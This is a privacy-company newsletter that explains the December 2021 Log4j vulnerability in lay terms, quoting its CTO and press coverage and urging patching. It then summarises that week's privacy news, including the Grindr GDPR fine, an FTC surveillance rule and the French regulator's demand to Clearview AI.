As TIME reported, top U.S. cybersecurity defense official, Jen Easterly, deemed the flaw “one of the most serious I’ve seen in my entire career, if not the most serious," in a call with authorities. "Publicly disclosed last Thursday, it’s catnip for cybercriminals and digital spies because it allows easy, password-free entry.”
Okay, but what does that all mean? I wanted to find out. Partly because I was interested and partly because I can't stand feeling like I'm not tech-savvy enough to be part of the conversation. So I asked Osano's CTO, Scott Hertel, to explain it to me like he was explaining it to his kids. Here's what I found out based on that conversation and recent media reports.
What is Log4j?
In industry speak, Log4j is an open-source logging tool. If that means nothing to you: Same. So I asked around. What it means in laymen’s terms is that Log4j is a tool web developers use to get reports, in text files, of what’s happening with their code. It’s the most widely used tool for “debugging,” or fixing, issues that show up in the code developers are writing.
Think about Log4j reports as journal entries for web developers. Sometimes, the logs are just recording entries. Sometimes, those logs tell you there are red flags in that journal entry.
Often, Log4j is the roadmap to where the problems exist.
Why did Log4j make news this week?
Okay, so every developer basically uses Log4j. On Dec. 10, New Zealand’s cyber-security incident reporting site reported that the Log4j vulnerability was being exploited. “Reports from online users show that this is being actively exploited in the wild and that proof-of-concept code has been published.”
What the heck does that mean? Log4j had been hacked. And unless any web developers using Log4j updated their software to the “patched” – that means “fixed,” in developer speak – their systems were at risk. Otherwise, malicious actors could gain external control of a computer’s system. As Osano Chief Technology Officer Scott Hertel explained to me, the Log4j vulnerability was like “lowering the drawbridge to the castle.” Hackers that wanted to exploit the vulnerability could get inside if they acted quickly before organizations made the appropriate “patches.”
“To exploit Log4Shell, an attacker only needs to get the system to log a strategically crafted string of code,” WIRED reported. “From there they can load arbitrary code on the targeted server and install malware or launch other attacks.”
Here’s what it’s a bit scary, still
It’s hard to know how many sites were affected by the Log4j. It’s such a pervasive tool that chances are any given developer might be running Log4j without knowing it’s within their infrastructure.
The repercussions are still to be seen.
As WIRED reported, “What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” said independent security researcher Chris Frohoff. “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.”
Security experts say the best thing to do is patch the vulnerability. If you have “an internet-facing server” that’s vulnerable to the Log4j, “you almost certainly have an incident response on your hands.”
So make sure your company investigates where it might be using Log4j, and get patching! In the meantime, here's the week's big news. Happy holidays!
This week's top privacy news
Log4j, the vulnerability that panicked an entire industry this week
Security professionals say it's one of the worst computer vulnerabilities they've ever seen, the AP reports. The Department of Homeland Security told federal agencies to immediately fix the security bug because "it's so easily exploitable." The utility, Log4j, is one of the most widely used developer tools, and the vulnerability allows hackers to "easily seize control of everything from industrial control systems to web servers and consumer electronics."
Apple privacy changes incite Polish regulatory investigation
Apple is facing in an investigation in Poland over whether its new rules on privacy and personal data processing for iOS devices violate competition law, Reuters reports. Following Apple’s update to its operating system, users can now opt out of being tracked by digital advertisers. But the Polish anti-monopoly regulator said the update hurt third-party apps by limiting their abilities to obtain personal data to send ads. The Polish regulator is concerned Apple’s actions may be a “case of exclusionary abuse of market power.”
Norway fines Grindr $7M for violating the GDPR
Norway’s privacy authority has fined dating app Grindr 64 million kroner ($7.6 million) for sending sensitive personal data to hundreds of potential advertising partners without user consent, the New York Post reports. It’s the Norwegian Data Protection Authority’s highest fine to date. Grindr said the ruling, which alleges the company violated the EU’s GDPR, is based on consent policies from years back, not its current practices. It will appeal the fine.
FTC may consider rule to limit commercial surveillance
The U.S. Federal Trade Commission is considering creating a rule aimed at digital platforms that track their users or allow others to do so. The FTC submitted the “Trade Regulation Rule on Commercial Surveillance” to the Office of Management and budget on its potential upcoming regulatory actions, TechCrunch reports. The rule would “curb lax security practices, limit privacy abuses and ensure that algorithmic decision-making does not result in unlawful discrimination,” the report states.
How to prepare for the CPRA: California’s incoming privacy law
The California Privacy Rights Act (CPRA) of 2020 will replace the California Consumer Privacy Act (CCPA) of 2018. Many organizations will need to make some adjustments to data processing and sharing based on the new requirements. In this webinar, learn from Hogan Lovells’ Julian Flamant, Hintze Law’s Jevan Hutson and Osano’s Catherine Dawson about the changes to come on Jan. 1, 2023, and why you need to make changes much sooner than that.
French data protection authority demands Clearview stop collecting faces
The French data protection authority (CNIL) has ordered Clearview AI, a facial recognition company, to stop amassing and using data from French people, Reuters reports. This week, the CNIL made a “formal demand” and said the company’s collection of publicly-available facial images on social media and the internet had no legal basis and therefore breached the EU GDPR. Clearview AI denies it breached the law, saying it doesn’t have any customers in France or the EU.